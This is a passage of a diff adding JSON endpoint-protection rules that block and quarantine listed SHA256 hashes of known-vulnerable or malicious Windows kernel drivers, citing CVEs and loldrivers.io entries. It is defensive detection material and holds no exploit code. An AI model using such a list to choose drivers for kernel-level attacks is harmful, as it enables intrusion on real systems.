+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8cf64ce4-eb07-5796-b0e6-321ee2f458da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148224Z",
+ "creation_date": "2026-03-23T11:45:31.148226Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a2a2374a88951cdf69c9215659bf9dd12125669e4143df3c574a2041ddafb92",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d026852-d879-546f-b98c-1641dd8d3047",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810254Z",
+ "creation_date": "2026-03-23T11:45:31.810256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e0cda9601a0a53bdc07b9c678de3571ca33666cf354a7ef36a2939107bfd7ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d0c765d-ca1d-5c84-8c33-0d57bfc984a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978423Z",
+ "creation_date": "2026-03-23T11:45:29.978425Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b019ebd77ac19cdd72bba3318032752649bd56a7576723a8ae1cccd70ee1e61a",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d15a630-c118-57f1-8d0d-15e963aaac2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453577Z",
+ "creation_date": "2026-03-23T11:45:30.453581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e556fc49ab6caeb5b835abf683ff04a39f0e467ea5607187c8b2fcf2ca77314",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d1d9d93-9a73-5fb6-8235-a9f944c04526",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495390Z",
+ "creation_date": "2026-03-23T11:45:31.495393Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28aeefa1f2d98aef61a1c972f4b3d2ef759301440f78e74cca16ef96c9d23f32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d24d0eb-1a5a-5982-a2d3-756332791807",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983703Z",
+ "creation_date": "2026-03-23T11:45:29.983705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54bc506b2f0cf66d12d4a2415ab743c2b2a1f3079089e3e0c0c1f3f49dd7335e",
+ "comment": "Vulnerable Kernel Driver (aka WCPU.sys) [https://www.loldrivers.io/drivers/7f645b95-4374-47ae-be1a-e4415308b550/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d30dbe7-3f97-5ca9-b7c2-16a18c094cb7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607668Z",
+ "creation_date": "2026-03-23T11:45:29.607670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7da6113183328d4fddf6937c0c85ef65ba69bfe133b1146193a25bcf6ae1f9dd",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d474abf-c415-5088-8ecf-aee802e4ff47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828973Z",
+ "creation_date": "2026-03-23T11:45:30.828975Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ad8e224c4c5fd1698b9898e9003a18edee6e44dac2e778a269b121a9f722ae0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d50322e-9191-5266-b667-464e4ffbdc7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971908Z",
+ "creation_date": "2026-03-23T11:45:29.971910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ae3056a475fbf96c109185a3a44abe8a5af461cb9310370f595adda1ce2df28",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d584675-f651-54e3-82fc-f59a68718bdf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151841Z",
+ "creation_date": "2026-03-23T11:45:31.151845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50cb1ea20990e0fc95cefd5354f857eb21724f637f807b885722515fa0b3d9fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d70af87-1e2a-5462-9ca6-d74a1864b714",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973739Z",
+ "creation_date": "2026-03-23T11:45:29.973740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ffdde6bc6784c13c601442e47157062941c47015891e7139c2aaba676ab59cc",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d761b0e-c6a1-5c3f-b5b2-ee58319a695c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460096Z",
+ "creation_date": "2026-03-23T11:45:30.460099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22e125c284a55eb730f03ec27b87ab84cf897f9d046b91c76bea2b5809fd51c5",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d86abc2-7479-5ba2-be36-627be8b90423",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145697Z",
+ "creation_date": "2026-03-23T11:45:32.145700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1afc1d0672c14df8c9e4caa88f5d3b7968421d72c548b6df307e371b9a8776d5",
+ "comment": "Malicious Kernel Driver (aka driver_1afc1d06.sys) [https://www.loldrivers.io/drivers/d7773616-9860-4768-b6a2-d74f32c23b4e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d86ba3b-abe2-514b-a706-d87ab491adec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606575Z",
+ "creation_date": "2026-03-23T11:45:29.606577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4533a11f4f190354b749f2842b57233e5e9e8b37fa4031bcb976118cff902101",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d8883da-1a6e-566c-b1e9-11b057207a62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143148Z",
+ "creation_date": "2026-03-23T11:45:31.143150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "002b9b5e83fb76da6e3e98c7de0f515de55429059026b03fd3bc8973f9227857",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d9005c2-cc7c-5318-b64a-0313f39b3aa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491494Z",
+ "creation_date": "2026-03-23T11:45:31.491497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe0b4f7ebed27bedbab89926bd7637f91963b4c7364709f68ead295ee89660e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8da0ebde-0443-5844-98ea-10362b3afd71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603902Z",
+ "creation_date": "2026-03-23T11:45:29.603904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.603910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdf49774a13d717c1f0b84bf82f4d9ec652994a475f0b8a0a3ab685cd5fd74a4",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8dbad857-0663-55e4-9e0f-c36d79768c6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146673Z",
+ "creation_date": "2026-03-23T11:45:31.146675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8ca82693f85a31d0dca7731fdc112d5cf619d3c65deebb58b0f1d9b045b7d4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8dc5fb8c-f347-5b3c-bc21-a026ce5505f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972072Z",
+ "creation_date": "2026-03-23T11:45:29.972074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b51ddcf8309c80384986dda9b11bf7856b030e3e885b0856efdb9e84064917e5",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ddda757-36db-577d-a31d-d35b5e272919",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491965Z",
+ "creation_date": "2026-03-23T11:45:31.491967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f98e425d04b84057f995dccfd76941b40baa512a839440a325a3255d7c964a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8de7054e-720b-5521-970d-1843c428d0cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620600Z",
+ "creation_date": "2026-03-23T11:45:29.620602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8df0eef2-ab25-56a2-a736-f5f282230a36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621547Z",
+ "creation_date": "2026-03-23T11:45:29.621549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b0f442ac0bb183906700097d65aed0b4b9d8678f9a01aca864854189fe368e7",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8df3933f-628a-59af-b984-9f1d3c92a03e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
